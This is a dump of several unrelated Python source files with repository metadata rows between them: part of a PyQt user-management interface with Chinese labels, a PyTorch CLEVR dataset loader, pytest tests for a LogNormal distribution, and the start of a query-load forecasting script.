"background:#CCFF99\n"
"}")
self.commitTableDel.setObjectName("commitTableDel")
self.split_3 = QtWidgets.QFrame(self.page_3)
self.split_3.setGeometry(QtCore.QRect(10, 30, 600, 2))
self.split_3.setStyleSheet("color:#CCFFCC;\n"
"border-color:#CCFFCC;\n"
"background-color:#CCFFCC")
self.split_3.setFrameShape(QtWidgets.QFrame.HLine)
self.split_3.setFrameShadow(QtWidgets.QFrame.Raised)
self.split_3.setObjectName("split_3")
self.toolButton_2 = QtWidgets.QToolButton(self.page_3)
self.toolButton_2.setGeometry(QtCore.QRect(20, 0, 101, 31))
font = QtGui.QFont()
font.setFamily("FontAwesome")
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.toolButton_2.setFont(font)
self.toolButton_2.setStyleSheet("border:none")
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap("./pictures/search1.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.toolButton_2.setIcon(icon2)
self.toolButton_2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.toolButton_2.setObjectName("toolButton_2")
self.line = QtWidgets.QFrame(self.page_3)
self.line.setGeometry(QtCore.QRect(10, 230, 601, 16))
self.line.setFrameShape(QtWidgets.QFrame.HLine)
self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line.setObjectName("line")
self.stackedWidget.addWidget(self.page_3)
self.page_2 = QtWidgets.QWidget()
self.page_2.setObjectName("page_2")
self.label_9 = QtWidgets.QLabel(self.page_2)
self.label_9.setGeometry(QtCore.QRect(100, 60, 101, 40))
self.label_9.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_9.setObjectName("label_9")
self.split_2 = QtWidgets.QFrame(self.page_2)
self.split_2.setGeometry(QtCore.QRect(10, 30, 600, 2))
self.split_2.setStyleSheet("color:#CCFFCC;\n"
"border-color:#CCFFCC;\n"
"background-color:#CCFFCC")
self.split_2.setFrameShape(QtWidgets.QFrame.HLine)
self.split_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.split_2.setObjectName("split_2")
self.label_10 = QtWidgets.QLabel(self.page_2)
self.label_10.setGeometry(QtCore.QRect(100, 260, 101, 41))
self.label_10.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_10.setObjectName("label_10")
self.label_11 = QtWidgets.QLabel(self.page_2)
self.label_11.setGeometry(QtCore.QRect(100, 110, 101, 41))
self.label_11.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_11.setObjectName("label_11")
self.label_12 = QtWidgets.QLabel(self.page_2)
self.label_12.setGeometry(QtCore.QRect(100, 310, 101, 41))
self.label_12.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_12.setObjectName("label_12")
self.label_13 = QtWidgets.QLabel(self.page_2)
self.label_13.setGeometry(QtCore.QRect(100, 160, 101, 41))
self.label_13.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_13.setObjectName("label_13")
self.label_14 = QtWidgets.QLabel(self.page_2)
self.label_14.setGeometry(QtCore.QRect(100, 360, 101, 41))
self.label_14.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_14.setObjectName("label_14")
self.label_15 = QtWidgets.QLabel(self.page_2)
self.label_15.setGeometry(QtCore.QRect(100, 210, 101, 41))
self.label_15.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_15.setObjectName("label_15")
self.label_16 = QtWidgets.QLabel(self.page_2)
self.label_16.setGeometry(QtCore.QRect(100, 410, 101, 41))
self.label_16.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_16.setObjectName("label_16")
self.label_17 = QtWidgets.QLabel(self.page_2)
self.label_17.setGeometry(QtCore.QRect(100, 460, 101, 41))
self.label_17.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_17.setObjectName("label_17")
self.inputsid = QtWidgets.QLineEdit(self.page_2)
self.inputsid.setGeometry(QtCore.QRect(220, 70, 221, 21))
self.inputsid.setObjectName("inputsid")
self.inputname = QtWidgets.QLineEdit(self.page_2)
self.inputname.setGeometry(QtCore.QRect(220, 120, 221, 21))
self.inputname.setObjectName("inputname")
self.inputuser = QtWidgets.QLineEdit(self.page_2)
self.inputuser.setGeometry(QtCore.QRect(220, 270, 221, 21))
self.inputuser.setObjectName("inputuser")
self.inputpwd = QtWidgets.QLineEdit(self.page_2)
self.inputpwd.setGeometry(QtCore.QRect(220, 320, 221, 21))
self.inputpwd.setObjectName("inputpwd")
self.inputrole = QtWidgets.QLineEdit(self.page_2)
self.inputrole.setGeometry(QtCore.QRect(220, 370, 221, 21))
self.inputrole.setObjectName("inputrole")
self.inputidcard = QtWidgets.QLineEdit(self.page_2)
self.inputidcard.setGeometry(QtCore.QRect(220, 420, 221, 21))
self.inputidcard.setObjectName("inputidcard")
self.inputphone = QtWidgets.QLineEdit(self.page_2)
self.inputphone.setGeometry(QtCore.QRect(220, 470, 221, 21))
self.inputphone.setObjectName("inputphone")
self.toolButton_3 = QtWidgets.QToolButton(self.page_2)
self.toolButton_3.setGeometry(QtCore.QRect(20, 0, 111, 31))
font = QtGui.QFont()
font.setFamily("FontAwesome")
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.toolButton_3.setFont(font)
self.toolButton_3.setStyleSheet("border:none\n"
"")
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap("./pictures/insert.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.toolButton_3.setIcon(icon3)
self.toolButton_3.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.toolButton_3.setObjectName("toolButton_3")
self.commitAdd = QtWidgets.QPushButton(self.page_2)
self.commitAdd.setGeometry(QtCore.QRect(200, 530, 211, 31))
self.commitAdd.setStyleSheet("#commitAdd{background:#CCFFCC;\n"
"border-radius:8px}\n"
"#commitAdd:hover\n"
"{\n"
"background:#CCFF99\n"
"}")
self.commitAdd.setObjectName("commitAdd")
self.inputdate = QtWidgets.QDateEdit(self.page_2)
self.inputdate.setGeometry(QtCore.QRect(220, 220, 221, 22))
self.inputdate.setDateTime(QtCore.QDateTime(QtCore.QDate(2020, 1, 1), QtCore.QTime(0, 0, 0)))
self.inputdate.setObjectName("inputdate")
self.inputfemale = QtWidgets.QRadioButton(self.page_2)
self.inputfemale.setGeometry(QtCore.QRect(320, 170, 115, 19))
self.inputfemale.setObjectName("inputfemale")
self.inputmale = QtWidgets.QRadioButton(self.page_2)
self.inputmale.setGeometry(QtCore.QRect(220, 170, 81, 19))
self.inputmale.setObjectName("inputmale")
self.stackedWidget.addWidget(self.page_2)
self.page_4 = QtWidgets.QWidget()
self.page_4.setObjectName("page_4")
self.split_4 = QtWidgets.QFrame(self.page_4)
self.split_4.setGeometry(QtCore.QRect(10, 30, 600, 2))
self.split_4.setStyleSheet("color:#CCFFCC;\n"
"border-color:#CCFFCC;\n"
"background-color:#CCFFCC")
self.split_4.setFrameShape(QtWidgets.QFrame.HLine)
self.split_4.setFrameShadow(QtWidgets.QFrame.Raised)
self.split_4.setObjectName("split_4")
self.toolButton_4 = QtWidgets.QToolButton(self.page_4)
self.toolButton_4.setGeometry(QtCore.QRect(20, 0, 111, 31))
font = QtGui.QFont()
font.setFamily("FontAwesome")
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.toolButton_4.setFont(font)
self.toolButton_4.setStyleSheet("border:none\n"
"")
icon4 = QtGui.QIcon()
icon4.addPixmap(QtGui.QPixmap("./pictures/delete.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.toolButton_4.setIcon(icon4)
self.toolButton_4.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.toolButton_4.setObjectName("toolButton_4")
self.deleteTable = QtWidgets.QTableWidget(self.page_4)
self.deleteTable.setGeometry(QtCore.QRect(10, 260, 601, 341))
self.deleteTable.setStyleSheet("")
self.deleteTable.setObjectName("deleteTable")
self.deleteTable.setColumnCount(9)
self.deleteTable.setRowCount(0)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(2, item)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(3, item)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(4, item)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(5, item)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(6, item)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(7, item)
item = QtWidgets.QTableWidgetItem()
self.deleteTable.setHorizontalHeaderItem(8, item)
self.desid = QtWidgets.QLineEdit(self.page_4)
self.desid.setGeometry(QtCore.QRect(250, 90, 221, 21))
self.desid.setObjectName("desid")
self.label_18 = QtWidgets.QLabel(self.page_4)
self.label_18.setGeometry(QtCore.QRect(150, 80, 91, 40))
self.label_18.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_18.setObjectName("label_18")
self.dename = QtWidgets.QLineEdit(self.page_4)
self.dename.setGeometry(QtCore.QRect(250, 130, 221, 21))
self.dename.setObjectName("dename")
self.label_19 = QtWidgets.QLabel(self.page_4)
self.label_19.setGeometry(QtCore.QRect(150, 120, 91, 41))
self.label_19.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_19.setObjectName("label_19")
self.deidcard = QtWidgets.QLineEdit(self.page_4)
self.deidcard.setGeometry(QtCore.QRect(250, 170, 221, 21))
self.deidcard.setObjectName("deidcard")
self.label_20 = QtWidgets.QLabel(self.page_4)
self.label_20.setGeometry(QtCore.QRect(150, 160, 81, 41))
self.label_20.setStyleSheet("font: 9pt \"FontAwesome\";")
self.label_20.setObjectName("label_20")
self.commitDe = QtWidgets.QPushButton(self.page_4)
self.commitDe.setGeometry(QtCore.QRect(240, 210, 93, 28))
self.commitDe.setStyleSheet("#commitDe{background:#CCFFCC;\n"
"border-radius:8px}\n"
"#commitDe:hover\n"
"{\n"
"background:#CCFF99\n"
"}")
self.commitDe.setObjectName("commitDe")
self.label_21 = QtWidgets.QLabel(self.page_4)
self.label_21.setGeometry(QtCore.QRect(210, 35, 211, 31))
font = QtGui.QFont()
font.setFamily("FontAwesome")
font.setPointSize(12)
font.setBold(False)
font.setWeight(50)
self.label_21.setFont(font)
self.label_21.setObjectName("label_21")
self.stackedWidget.addWidget(self.page_4)
self.listWidget = QtWidgets.QListWidget(self.centralwidget)
self.listWidget.setGeometry(QtCore.QRect(0, 200, 204, 400))
self.listWidget.setObjectName("listWidget")
item = QtWidgets.QListWidgetItem()
font = QtGui.QFont()
font.setFamily("FontAwesome")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
item.setFont(font)
icon5 = QtGui.QIcon()
icon5.addPixmap(QtGui.QPixmap("./pictures/staff5.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
item.setIcon(icon5)
self.listWidget.addItem(item)
item = QtWidgets.QListWidgetItem()
font = QtGui.QFont()
font.setFamily("FontAwesome")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
item.setFont(font)
icon6 = QtGui.QIcon()
icon6.addPixmap(QtGui.QPixmap("./pictures/staff2.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
item.setIcon(icon6)
self.listWidget.addItem(item)
item = QtWidgets.QListWidgetItem()
font = QtGui.QFont()
font.setFamily("FontAwesome")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
item.setFont(font)
icon7 = QtGui.QIcon()
icon7.addPixmap(QtGui.QPixmap("./pictures/staff4.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
item.setIcon(icon7)
self.listWidget.addItem(item)
item = QtWidgets.QListWidgetItem()
font = QtGui.QFont()
font.setFamily("FontAwesome")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
item.setFont(font)
item.setIcon(icon5)
self.listWidget.addItem(item)
self.frame = QtWidgets.QFrame(self.centralwidget)
self.frame.setGeometry(QtCore.QRect(0, 0, 204, 211))
self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.head = QtWidgets.QToolButton(self.frame)
self.head.setGeometry(QtCore.QRect(60, 20, 60, 60))
self.head.setText("")
self.head.setIcon(icon)
self.head.setIconSize(QtCore.QSize(60, 60))
self.head.setObjectName("head")
self.welcome = QtWidgets.QLabel(self.frame)
self.welcome.setGeometry(QtCore.QRect(30, 90, 110, 20))
self.welcome.setText("")
self.welcome.setAlignment(QtCore.Qt.AlignCenter)
self.welcome.setObjectName("welcome")
self.label_2 = QtWidgets.QLabel(self.frame)
self.label_2.setGeometry(QtCore.QRect(40, 140, 121, 16))
font = QtGui.QFont()
font.setPointSize(8)
self.label_2.setFont(font)
self.label_2.setObjectName("label_2")
self.Search = QtWidgets.QLineEdit(self.frame)
self.Search.setGeometry(QtCore.QRect(20, 170, 145, 25))
font = QtGui.QFont()
font.setFamily("微软雅黑")
font.setPointSize(7)
self.Search.setFont(font)
self.Search.setStyleSheet("")
self.Search.setObjectName("Search")
self.toolButton = QtWidgets.QToolButton(self.frame)
self.toolButton.setGeometry(QtCore.QRect(170, 170, 21, 20))
self.toolButton.setStyleSheet("background-color:#2f4050;\n"
"border:0px;\n"
"\n"
"border-radius:5px")
self.toolButton.setText("")
self.toolButton.setIcon(icon1)
self.toolButton.setIconSize(QtCore.QSize(15, 15))
self.toolButton.setObjectName("toolButton")
self.role = QtWidgets.QLabel(self.frame)
self.role.setGeometry(QtCore.QRect(30, 120, 110, 15))
font = QtGui.QFont()
font.setPointSize(7)
self.role.setFont(font)
self.role.setText("")
self.role.setAlignment(QtCore.Qt.AlignCenter)
self.role.setObjectName("role")
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
self.stackedWidget.setCurrentIndex(1)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.name.setText(_translate("MainWindow", "csa "))
self.label.setText(_translate("MainWindow", "姓名:"))
self.label_3.setText(_translate("MainWindow", "性别:"))
self.label_4.setText(_translate("MainWindow", "申请时间:"))
self.label_5.setText(_translate("MainWindow", "权限:"))
self.label_6.setText(_translate("MainWindow", "手机号:"))
self.label_7.setText(_translate("MainWindow", "身份证号:"))
self.sname.setText(_translate("MainWindow", "邵嘉毅"))
self.ssex.setText(_translate("MainWindow", "男"))
self.stime.setText(_translate("MainWindow", "2019-12-12"))
self.srole.setText(_translate("MainWindow", "1"))
self.sphone.setText(_translate("MainWindow", "2332121323"))
self.sidcard.setText(_translate("MainWindow", "1111111111111111111"))
self.label_8.setText(_translate("MainWindow", "用户号:"))
self.sidcard_2.setText(_translate("MainWindow", "1"))
item = self.searchTable.horizontalHeaderItem(0)
item.setText(_translate("MainWindow", "用户编号"))
item = self.searchTable.horizontalHeaderItem(1)
item.setText(_translate("MainWindow", "姓名"))
item = self.searchTable.horizontalHeaderItem(2)
item.setText(_translate("MainWindow", "性别"))
item = self.searchTable.horizontalHeaderItem(3)
item.setText(_translate("MainWindow", "登记申请时间"))
item = self.searchTable.horizontalHeaderItem(4)
item.setText(_translate("MainWindow", "账户名"))
item = self.searchTable.horizontalHeaderItem(5)
item.setText(_translate("MainWindow", "密码"))
item = self.searchTable.horizontalHeaderItem(6)
item.setText(_translate("MainWindow", "权限"))
item = self.searchTable.horizontalHeaderItem(7)
item.setText(_translate("MainWindow", "身份证号"))
item = self.searchTable.horizontalHeaderItem(8)
item.setText(_translate("MainWindow", "手机号"))
self.searchName.setPlaceholderText(_translate("MainWindow", "搜索用户姓名"))
self.label_74.setText(_translate("MainWindow", "选中部分修改为:"))
self.modifyvalue.setPlaceholderText(_translate("MainWindow", "修改值"))
self.commitTableModify.setText(_translate("MainWindow", "确认修改"))
self.label_78.setText(_translate("MainWindow", "*选中表格内可以进行修改和删除操作"))
self.commitTableDel.setText(_translate("MainWindow", "确认删除"))
self.toolButton_2.setText(_translate("MainWindow", "查询用户"))
self.label_9.setText(_translate("MainWindow", "用户编号:"))
self.label_10.setText(_translate("MainWindow", "账户名:"))
self.label_11.setText(_translate("MainWindow", "用户姓名:"))
self.label_12.setText(_translate("MainWindow", "密码:"))
self.label_13.setText(_translate("MainWindow", "用户性别:"))
self.label_14.setText(_translate("MainWindow", "权限:"))
self.label_15.setText(_translate("MainWindow", "登记入职时间:"))
self.label_16.setText(_translate("MainWindow", "身份证:"))
self.label_17.setText(_translate("MainWindow", "手机号:"))
self.inputsid.setPlaceholderText(_translate("MainWindow", "编号"))
self.inputname.setPlaceholderText(_translate("MainWindow", "姓名"))
self.inputuser.setPlaceholderText(_translate("MainWindow", "账号名"))
self.inputpwd.setPlaceholderText(_translate("MainWindow", "密码"))
self.inputrole.setPlaceholderText(_translate("MainWindow", "权限"))
self.inputidcard.setPlaceholderText(_translate("MainWindow", "身份证"))
self.inputphone.setPlaceholderText(_translate("MainWindow", "手机号"))
self.toolButton_3.setText(_translate("MainWindow", "增添用户"))
self.commitAdd.setText(_translate("MainWindow", "确认录入"))
self.inputfemale.setText(_translate("MainWindow", "女"))
self.inputmale.setText(_translate("MainWindow", "男"))
self.toolButton_4.setText(_translate("MainWindow", "删除用户"))
item = self.deleteTable.horizontalHeaderItem(0)
item.setText(_translate("MainWindow", "用户编号"))
item = self.deleteTable.horizontalHeaderItem(1)
item.setText(_translate("MainWindow", "姓名"))
item = self.deleteTable.horizontalHeaderItem(2)
item.setText(_translate("MainWindow", "性别"))
item = self.deleteTable.horizontalHeaderItem(3)
item.setText(_translate("MainWindow", "登记入职时间"))
item = self.deleteTable.horizontalHeaderItem(4)
item.setText(_translate("MainWindow", "账户名"))
item = self.deleteTable.horizontalHeaderItem(5)
item.setText(_translate("MainWindow", "密码"))
item = self.deleteTable.horizontalHeaderItem(6)
item.setText(_translate("MainWindow", "权限"))
item = self.deleteTable.horizontalHeaderItem(7)
item.setText(_translate("MainWindow", "身份证号"))
item = self.deleteTable.horizontalHeaderItem(8)
item.setText(_translate("MainWindow", "手机号"))
self.desid.setPlaceholderText(_translate("MainWindow", "编号"))
self.label_18.setText(_translate("MainWindow", "用户编号:"))
self.dename.setPlaceholderText(_translate("MainWindow", "姓名"))
self.label_19.setText(_translate("MainWindow", "用户姓名:"))
self.deidcard.setPlaceholderText(_translate("MainWindow", "身份证"))
self.label_20.setText(_translate("MainWindow", "身份证:"))
self.commitDe.setText(_translate("MainWindow", "确认删除"))
self.label_21.setText(_translate("MainWindow", "选择要删除的用户:"))
__sortingEnabled = self.listWidget.isSortingEnabled()
self.listWidget.setSortingEnabled(False)
item = self.listWidget.item(0)
item.setText(_translate("MainWindow", " 个人信息"))
item = self.listWidget.item(1)
item.setText(_translate("MainWindow", " 查询用户*"))
item = self.listWidget.item(2)
item.setText(_translate("MainWindow", " 增添用户*"))
item = self.listWidget.item(3)
item.setText(_translate("MainWindow", " 删除用户*"))
self.listWidget.setSortingEnabled(__sortingEnabled)
self.label_2.setText(_translate("MainWindow", "*表示需要最高权限"))
self.Search.setPlaceholderText(_translate("MainWindow", "搜索"))
| 46.750939
| 101
| 0.591235
| 37,819
| 0.993668
| 0
| 0
| 0
| 0
| 0
| 0
| 6,332
| 0.166369
|
42308174a4346509fdf47445522e3c2f26a6c431
| 2,171
|
py
|
Python
|
dataset.py
|
ceyzaguirre4/mac-network-pytorch
|
ad2deefc8a987ab92f4911d3d98631f22d0ae44a
|
[
"MIT"
] | 4
|
2020-04-08T22:19:19.000Z
|
2020-10-28T23:22:12.000Z
|
dataset.py
|
ceyzaguirre4/mac-network-pytorch
|
ad2deefc8a987ab92f4911d3d98631f22d0ae44a
|
[
"MIT"
] | null | null | null |
dataset.py
|
ceyzaguirre4/mac-network-pytorch
|
ad2deefc8a987ab92f4911d3d98631f22d0ae44a
|
[
"MIT"
] | 3
|
2020-06-27T02:47:02.000Z
|
2021-10-08T13:19:05.000Z
|
import os
import pickle
import numpy as np
from PIL import Image
import torch
from torch.utils.data import Dataset
from torchvision import transforms
import h5py
from transforms import Scale
class CLEVR(Dataset):
def __init__(self, root, split='train', transform=None):
features_path = os.path.join(root, 'features')
with open('{}/{}.pkl'.format(features_path, split), 'rb') as f:
self.data = pickle.load(f)
# self.transform = transform
self.root = root
self.split = split
self.h = h5py.File('{}/{}_features.hdf5'.format(features_path, split), 'r')
self.img = self.h['data']
def close(self):
self.h.close()
def __getitem__(self, index):
imgfile, question, answer, family = self.data[index]
# img = Image.open(os.path.join(self.root, 'images',
# self.split, imgfile)).convert('RGB')
# img = self.transform(img)
id = int(imgfile.rsplit('_', 1)[1][:-4])
img = torch.from_numpy(self.img[id])
return img, question, len(question), answer, family, index
def __len__(self):
return len(self.data)
transform = transforms.Compose([
Scale([224, 224]),
transforms.Pad(4),
transforms.RandomCrop([224, 224]),
transforms.ToTensor(),
transforms.Normalize(mean=[0.5, 0.5, 0.5],
std=[0.5, 0.5, 0.5])
])
def collate_data(batch):
images, lengths, answers, families, idxs = [], [], [], [], []
batch_size = len(batch)
max_len = max(map(lambda x: len(x[1]), batch))
questions = np.zeros((batch_size, max_len), dtype=np.int64)
sort_by_len = sorted(batch, key=lambda x: len(x[1]), reverse=True)
for i, b in enumerate(sort_by_len):
image, question, length, answer, family, idx = b
images.append(image)
length = len(question)
questions[i, :length] = question
lengths.append(length)
answers.append(answer)
families.append(family)
idxs.append(idx)
return torch.stack(images), torch.from_numpy(questions), \
lengths, torch.LongTensor(answers), families, idxs
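# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# collate_data() sorts each batch by question length and pads questions to the longest
# one, so it has to be passed to the DataLoader explicitly. A minimal sketch; the data
# root below is a placeholder path, not taken from this repository:
#
#   from torch.utils.data import DataLoader
#   train_set = CLEVR('data/CLEVR_v1.0', split='train', transform=transform)
#   loader = DataLoader(train_set, batch_size=64, shuffle=True, collate_fn=collate_data)
#   images, questions, lengths, answers, families, idxs = next(iter(loader))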
| 29.739726
| 83
| 0.609857
| 986
| 0.454169
| 0
| 0
| 0
| 0
| 0
| 0
| 237
| 0.109166
|
4230af0cdb6333a2256b37fbde92023b5213c5d6
| 1,445
|
py
|
Python
|
tests/distributions/test_log_normal.py
|
thomasaarholt/xgboost-distribution
|
8ee00f7f0dcaadcb345ebcb15534287081aa987b
|
[
"MIT"
] | 17
|
2021-08-14T10:23:54.000Z
|
2022-01-08T11:54:48.000Z
|
tests/distributions/test_log_normal.py
|
thomasaarholt/xgboost-distribution
|
8ee00f7f0dcaadcb345ebcb15534287081aa987b
|
[
"MIT"
] | 17
|
2021-06-22T02:23:53.000Z
|
2022-03-02T16:03:21.000Z
|
tests/distributions/test_log_normal.py
|
thomasaarholt/xgboost-distribution
|
8ee00f7f0dcaadcb345ebcb15534287081aa987b
|
[
"MIT"
] | 6
|
2021-08-18T18:52:13.000Z
|
2021-11-19T08:36:50.000Z
|
import pytest
import numpy as np
import pandas as pd
from xgboost_distribution.distributions import LogNormal
@pytest.fixture
def lognormal():
return LogNormal()
def test_target_validation(lognormal):
valid_target = np.array([0.5, 1, 4, 5, 10])
lognormal.check_target(valid_target)
@pytest.mark.parametrize(
"invalid_target",
[np.array([0, 1.2]), pd.Series([-1.1, 0.4, 2.3])],
)
def test_target_validation_raises(lognormal, invalid_target):
with pytest.raises(ValueError):
lognormal.check_target(invalid_target)
@pytest.mark.parametrize(
"y, params, natural_gradient, expected_grad",
[
(
np.array([1, 1]),
np.array([[np.log(1), 2], [1, 0]]),
True,
np.array([[0, 0.5], [1, 0]]),
),
(
np.array([1, 1]),
np.array([[np.log(1), 2], [1, 0]]),
False,
np.array([[0, 1], [1, 0]]),
),
],
)
def test_gradient_calculation(lognormal, y, params, natural_gradient, expected_grad):
grad, hess = lognormal.gradient_and_hessian(
y, params, natural_gradient=natural_gradient
)
np.testing.assert_array_equal(grad, expected_grad)
def test_loss(lognormal):
loss_name, loss_value = lognormal.loss(
# fmt: off
y=np.array([0, ]),
params=np.array([[1, 0], ]),
)
assert loss_name == "LogNormalError"
assert loss_value == np.inf
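# --- Worked example behind the expected gradients (editor's addition) ---
# Assuming the distribution is parameterized as (loc, log_scale) of log(y) ~ Normal,
# the per-sample negative log-likelihood gradients are
#     d/d loc       = (loc - log y) / scale**2
#     d/d log_scale = 1 - ((log y - loc) / scale)**2
# and the natural gradient rescales these by the inverse Fisher information, i.e. by
# scale**2 and 1/2 respectively. For y = 1 and params = [log(1), 2] (loc = 0,
# scale = e**2) this gives [0, 1] plain and [0, 0.5] natural; for params = [1, 0]
# (loc = 1, scale = 1) it gives [1, 0] either way, which matches the arrays asserted
# in test_gradient_calculation above.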
| 24.083333
| 85
| 0.600692
| 0
| 0
| 0
| 0
| 960
| 0.66436
| 0
| 0
| 86
| 0.059516
|
4230f1879c1a68f9bf6052b16b5fb1dd036ba09b
| 14,169
|
py
|
Python
|
script/forecasting/forecaster.py
|
bialesdaniel/noisepage
|
44ca689bd818b1bd39b84a7fe5148ddaa65a61eb
|
[
"MIT"
] | null | null | null |
script/forecasting/forecaster.py
|
bialesdaniel/noisepage
|
44ca689bd818b1bd39b84a7fe5148ddaa65a61eb
|
[
"MIT"
] | null | null | null |
script/forecasting/forecaster.py
|
bialesdaniel/noisepage
|
44ca689bd818b1bd39b84a7fe5148ddaa65a61eb
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""
Main script for workload forecasting.
Example usage:
- Generate data (runs OLTP benchmark on the built database) and perform training, and save the trained model
./forecaster --gen_data --models=LSTM --model_save_path=model.pickle
- Use the trained models (LSTM) to generate predictions.
./forecaster --model_load_path=model.pickle --test_file=test_query.csv --test_model=LSTM
TODO:
- Better metrics for training and prediction (currently not focusing on models' accuracy yet)
- Multiple models (currently only simple-one-layer-untuned LSTM used)
- API and interaction with Pilot
"""
import argparse
import json
import pickle
from functools import lru_cache
from typing import Dict, List, Optional, Tuple, Union
import numpy as np
from ..testing.self_driving.constants import (DEFAULT_ITER_NUM,
DEFAULT_QUERY_TRACE_FILE,
DEFAULT_TPCC_WEIGHTS,
DEFAULT_WORKLOAD_PATTERN)
from ..testing.self_driving.forecast import gen_oltp_trace
from ..testing.util.constants import LOG
from .cluster import QueryCluster
from .data_loader import DataLoader
from .models import ForecastModel, get_models
# Interval duration for aggregation in microseconds
INTERVAL_MICRO_SEC = 500000
# Number of Microseconds per second
MICRO_SEC_PER_SEC = 1000000
# Number of data points in a sequence
SEQ_LEN = 10 * MICRO_SEC_PER_SEC // INTERVAL_MICRO_SEC
# Number of data points for the horizon
HORIZON_LEN = 30 * MICRO_SEC_PER_SEC // INTERVAL_MICRO_SEC
# Number of data points for testing set
EVAL_DATA_SIZE = 2 * SEQ_LEN + HORIZON_LEN
argp = argparse.ArgumentParser(description="Query Load Forecaster")
# Generation stage related options
argp.add_argument(
"--gen_data",
default=False,
action="store_true",
help="If specified, OLTP benchmark would be downloaded and built to generate the query trace data")
argp.add_argument(
"--tpcc_weight",
type=str,
default=DEFAULT_TPCC_WEIGHTS,
help="Workload weights for the TPCC")
argp.add_argument(
"--tpcc_rates",
nargs="+",
default=DEFAULT_WORKLOAD_PATTERN,
help="Rate array for the TPCC workload")
argp.add_argument(
"--pattern_iter",
type=int,
default=DEFAULT_ITER_NUM,
help="Number of iterations the DEFAULT_WORKLOAD_PATTERN should be run")
argp.add_argument("--trace_file", default=DEFAULT_QUERY_TRACE_FILE,
help="Path to the query trace file", metavar="FILE")
# Model specific
argp.add_argument("--models", nargs='+', type=str, help="Models to use")
argp.add_argument("--models_config", type=str, metavar="FILE",
help="Models and init arguments JSON config file")
argp.add_argument("--seq_len", type=int, default=SEQ_LEN,
help="Length of one sequence in number of data points")
argp.add_argument(
"--horizon_len",
type=int,
default=HORIZON_LEN,
help="Length of the horizon in number of data points, "
"aka, how many further in the a sequence is used for prediction"
)
# Training stage related options
argp.add_argument("--model_save_path", metavar="FILE",
help="Where the model trained will be stored")
argp.add_argument(
"--eval_size",
type=int,
default=EVAL_DATA_SIZE,
help="Length of the evaluation data set length in number of data points")
argp.add_argument("--lr", type=float, default=0.001, help="Learning rate")
argp.add_argument("--epochs", type=int, default=10,
help="Number of epochs for training")
# Testing stage related options
argp.add_argument(
"--model_load_path",
default="model.pickle",
metavar="FILE",
help="Where the model should be loaded from")
argp.add_argument(
"--test_file",
help="Path to the test query trace file",
metavar="FILE")
argp.add_argument(
"--test_model",
type=str,
help="Model to be used for forecasting"
)
class Forecaster:
"""
A wrapper around various ForecastModels, that prepares training and evaluation data.
"""
TRAIN_DATA_IDX = 0
TEST_DATA_IDX = 1
def __init__(
self,
trace_file: str,
interval_us: int = INTERVAL_MICRO_SEC,
test_mode: bool = False,
eval_size: int = EVAL_DATA_SIZE,
seq_len: int = SEQ_LEN,
horizon_len: int = HORIZON_LEN) -> None:
"""
Initializer
:param trace_file: trace file for the forecaster
:param interval_us: number of microseconds for the time-series interval
:param test_mode: True If the Loader is for testing
        :param eval_size: Number of data points used for evaluation (testing)
:param seq_len: Length of a sequence
:param horizon_len: Horizon length
"""
self._seq_len = seq_len
self._horizon_len = horizon_len
self._test_mode = test_mode
self._eval_data_size = eval_size
self._data_loader = DataLoader(
query_trace_file=trace_file,
interval_us=interval_us)
self._make_clusters()
def _make_clusters(self) -> None:
"""
Extract data from the DataLoader and put them into different clusters.
:return: None
"""
# FIXME:
# Assuming all the queries in the current trace file are from
# the same cluster for now. A future TODO would have a clustering
# process that separates traces into multiple clusters
self._clusters = [QueryCluster(self._data_loader.get_ts_data())]
